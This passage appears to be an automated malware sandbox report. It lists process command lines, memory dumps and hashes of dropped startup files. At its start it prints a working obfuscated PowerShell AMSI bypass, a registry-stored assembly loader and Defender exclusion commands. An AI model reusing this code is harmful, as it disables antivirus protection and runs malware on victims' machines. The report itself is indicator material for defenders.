@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eaFLgIIWtvN=$XGNzFszxOfdtL.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'d'+'l'+'l')));$wABVHMQrYEjHvh=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$COnTZLLtMOEuyAgOn=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$eaFLgIIWtvN,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$raCDuSL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wABVHMQrYEjHvh,$eHuKsvmAVPIIiRnVQsw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$JzmyhkInvwLCaepRW=$uqvipmuGFvoYqY.Invoke($Null,@([Object]$raCDuSL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+'e'+'r')));$xSmRcpBvxE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,4,[ref]$xSmRcpBvxE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JzmyhkInvwLCaepRW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($COnTZLLtMOEuyAgOn,$zVZKtbqIDcbtSGwsaNpBbj).Invoke($JzmyhkInvwLCaepRW,[uint32]8,0x20,[ref]$xSmRcpBvxE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4Joex1.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\x4Joex1.exe'
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2a93eae8-0868-45cf-842e-7636e08ae158}
C:\Users\Admin\x4Malicious
C:\Users\Admin\x4Malicious
C:\Users\Admin\x4Malicious
C:\Users\Admin\x4Malicious
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
Network
Files
memory/2480-872-0x0000000000390000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 051a74485331f9d9f5014e58ec71566c |
| SHA1 | 4ed0256a84f2e95609a0b4d5c249bca624db8fe4 |
| SHA256 | 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888 |
| SHA512 | 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 856900844f6f1c326c89d0bcfb2f0c28 |
| SHA1 | 1caad440d46fa8c0cbed4822b4be2bbdddba97c2 |
| SHA256 | ae24414ec53b3ae43ddbf1ff7b6643f8bf45281406f6415742f4305360d70a32 |
| SHA512 | ed8f421e151d797b33440dd0ddb6d6a5ec93fe7806ad82c60af3f77d545cf5dc319bce67804bd0613bb551a3f01648ec0d1918805dc7342145c8bb23ad12cab4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f0e62045515b66d0a0105abc22dbf19 |
| SHA1 | 894d685122f3f3c9a3457df2f0b12b0e851b394c |
| SHA256 | 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319 |
| SHA512 | f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b0a85f07903eaad4aace8865ff28679f |
| SHA1 | caa147464cf2e31bf9b482c3ba3c5c71951566d1 |
| SHA256 | c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5 |
| SHA512 | 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe
| MD5 | 10194be78216b8b290e3d8d02055957b |
| SHA1 | d5b42c116a56ca0fb507de577db183e5e740fe77 |
| SHA256 | 33ba879b2eec97789475dfea751a38002c0b89d7f61f610b6ead2fe18d6ee7e5 |
| SHA512 | 35b55168d8fb6632e176eaf8d74e9e8c50b27c0057e0c72098e81df55d6bd969a53c9138ef2b3486f5a32186d4294dd2e9c50d4f5842572dad698237fc9021ed |
memory/3672-1154-0x0000000000DB0000-0x0000000000DCA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe
| MD5 | 885df3eabb13cba468d3fe060b7561b0 |
| SHA1 | 9deeff0eabfc2f9ca0c8b2cd07a77565d0c5a376 |
| SHA256 | 8deb77e4f3cd316b63a1cefc208f9598533543639e143ea9867c4a93ebfe9de5 |
| SHA512 | 95f2b9e9a5e797508f28006163c737fb1b67c4ad7337fe65a6b63a3c7483f2014c66201f74bf1181d1add3414953eb4080be478b9fab7d8f4c30fb72d5fe540e |
memory/4672-1181-0x0000000000AA0000-0x0000000000B38000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e8a7ab7bae6a69946da69507ee7ae7b0 |
| SHA1 | b367c72fa4948493819e1c32c32239aa6e78c252 |
| SHA256 | cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272 |
| SHA512 | 89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683 |
memory/4672-1206-0x000000001CB10000-0x000000001CB4A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 190b28f40c0edd3cc08d0fd3aca4779a |
| SHA1 | 425b98532b6a18aa2baece47605f1cf6c8cfbd11 |
| SHA256 | 8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce |
| SHA512 | 8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 04493ed4421328d5e40252891bfe515a |
| SHA1 | ab8a4e3909ff849549ea989049ed30b490f274e7 |
| SHA256 | 3b14b48326a1201fc8b9667201c15392e52f7f5819c2aadafe19cbb72b08be51 |
| SHA512 | c8ca89143763a72f4ce8f10ffa2e161b59d41454bad0f71fcb4c7e9c8861a5d99bdc787907761bfb8439afad1f0557a1338bbb1054f5810de807633f515d5a76 |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7e46b66e9b3609911fdf14d0a418d978 |
| SHA1 | acd24b967cc801ecda3ae93dd0be6fd2a2ee5c9d |
| SHA256 | 81a642f2a14ab788978ed3a247432048cb6feb5be3cd40e276022562a4b7aa06 |
| SHA512 | 55b3f342fd0e097dd5028159d82d0b2c9f24669e334cc020c8c054e888157f2d67d6e618517900f4ee9a1f107c8ae6f9ae55d2f09833f6565964cfaa7fc0777e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a79484020d1fe82f2f791cc2582b5dec |
| SHA1 | 1c74da2b600fe1ac4ef9b41993b36fa6241c9e86 |
| SHA256 | 1c01ed1958207ff2e3a14430bd89b912a0ad28191817767764454ba0be1d4344 |
| SHA512 | e2a0bd264bc608c67eddfc333672b7cc201c35efd224bbc7f299a3fae6c3d18c8974fe8788dd90508a1f1b191ec53a0c8624c6285b011467ce71c4b82626fd04 |
memory/1540-1935-0x000000001B490000-0x000000001B49E000-memory.dmp
memory/3672-1943-0x000000001C8F0000-0x000000001C8FA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x4Malicious.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk
| MD5 | 7350b6b2078259137bddad4ac88b96f1 |
| SHA1 | d337d07890b665dd75068caa974847d451987225 |
| SHA256 | 1bd7ca6a81e76575f13076f3e80cdf95313a3ea0bf92c93babdf6d04e13cb606 |
| SHA512 | 795ac4f3fd22e89a068bd7e8cb140af6bfcd13738969ea997291b80b5f26177a59f5f5f907f95edcd2cbea0e2127a997f2c77e56ddf89921bf608f7d6114869c |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 8a86027e38ee15c51ee8865e6779ab0a |
| SHA1 | 19cdd9b88623ea87477cebe7a91b63d48b07b32c |
| SHA256 | 8210ee235cdf19788bc17d4ce419f1d79151b9aeaabf87a0ba7c6218acffc960 |
| SHA512 | 1ebf96a07b29fe9d70216fbbd5ba86dacca0e87b0416c2318e608068b224f80e03aae2c2f9f3302889d65f4623d25fe7d1ffa2c1324ae98ed60106c2fc9f46d2 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | cb76d822faa7e952296300763bed64cf |
| SHA1 | bd5477001d6f96ea7b640c2d0da9e0bc293bc090 |
| SHA256 | a4e304483c0ee4a73013c996f3bf98923ccef56381faed53f3ce72833ecf8ded |
| SHA512 | 12c835c94dd83ce7fee4439284f8d17d44a375e0de2d672370d7842f30c1efffd855be07a65756225e72405f4ed629936116b8b14e81d8147ab573bae64ebbf7 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 1e5ca1a3b67a5dfca2d4cdaa4b09778e |
| SHA1 | 532c39f79f0dc03756f49cf167eb4055d6e16f98 |
| SHA256 | 0f7cb79b5948a8aeefaae9432a1123baf8cedb5245d240d066652cb9019cebcf |
| SHA512 | 8327d747cdf5e0376310def9d4f7cb2679b471be4224944bd61effc4565e3db6a4e2a9dda4ae855d60110f672b1386f944b673e421b2e29f4a87d0c9133bc581 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 73f929ae27a3b93357b9eb4706764d5e |
| SHA1 | 492d30941e5dbb69c560001184a5131775ce35d9 |
| SHA256 | 7dec5e315a78b45e6cab16960c46d768482866a142a88bd6bad1c5a3e213d549 |
| SHA512 | bb82b73be2cd8d766a6e2eaf024770e7463d570d7207ca8b9868534757fd06b219c32627fc69a6413ee30ee23d7d76c41936a512b58a7e413de993083979a7e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme
| MD5 | a88cbd0d52f4c6c36104206331ce657d |
| SHA1 | 4fbd087d18822c11f13a718c7ce26889f05c4060 |
| SHA256 | e1e9094acc4260860125efb556839783182cfb401aa059e590e91a1619b5b665 |
| SHA512 | 48d360777f4156c3aa8404f15f92e08c99f1c1ba304bd4368b0486ee8c915427d0f3836b958ea4eb64be4e9d4a57023def86b115ed6d74403e66845adab876cb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme
| MD5 | 1b1ea000d772f4e993de6834c17b755d |
| SHA1 | 913f449a9932c0bd42eb748487bf8cfd8134c4a9 |
| SHA256 | 6449d0a3f0356b243a5b5b6570036f0bc3471ec8c764d60c23ba155013beb7f4 |
| SHA512 | ab316d98bd21cd28612ecbd381202b9e65ccebca770ec9a59b0d79dafa9bdcf4a58941532035c3a48a604fdaf3bfcd4bff6b4981e7c56d67ce11b6c2d907b5a5 |
C:\Windows\Panther\UnattendGC\diagwrn.xml
| MD5 | 26f17ae18099bfd0e81964751c8f5953 |
| SHA1 | 29f8f79c7d3ac8dfd402ae3a282141b7d4c07d32 |
| SHA256 | 730450b0d680be5cdb5de85546af077128cb24a42c6f419b86df8b072219dc7c |
| SHA512 | 879d1a2c8a1c32f0db84b840a72c257ecb7ec64435874b14d34073610227b0e078b27a8bb6f37e36e21442771daaf950ff9bd24e452eafdea5c196b607f872b2 |
C:\Windows\Panther\UnattendGC\diagerr.xml
| MD5 | 4c23ed218b1b803aa3772d963d486fc4 |
| SHA1 | 26c5a361572a4bbbc7e237d5d25feba2093c9f12 |
| SHA256 | d5aaa288fb1b7c3e00580f6fc5d580ba25d1a36721d479ea068625056ed85d05 |
| SHA512 | 97967f330577cd913eee1f6f687799b6a73d2b4ec39eebcabdb910d3b25aa8fa81bfa88d8bd84a78d0f005d1ab789f60fa346852b8bd134f622f27f094d7e3fc |
C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b0a40f6847934b610c24822c5c1e60b4 |
| SHA1 | 7a984562d0765a185ab4af0f6b574b326410e7eb |
| SHA256 | baa3c6350471601390dda37570a20a23567c582df132eb0fbe997f36ac831da2 |
| SHA512 | 05453981b9bd66438c4e707a2763e00f58929f41bc2802f01ba240f3d7d46a6f2a7be9c28192ba783ef42c33d0f1e50766a70edbd61e8c48f299e0da75712a8f |
C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 2e286dd0367aaf12ac7a61923b48c1e6 |
| SHA1 | 6757cfcc28a86552fa5d535bd8e2c247ef7b722d |
| SHA256 | d33e3afd37e7150f69f78c16355a039925bb53b624587ef37727f8954c801973 |
| SHA512 | c347fd6731e59da059863918e3bafa07bd50ea8f3e6f88ad8837b3301c3971376a0665d081df3d8501ae5538a306a97f06e237e679ea3bd725256cb497307511 |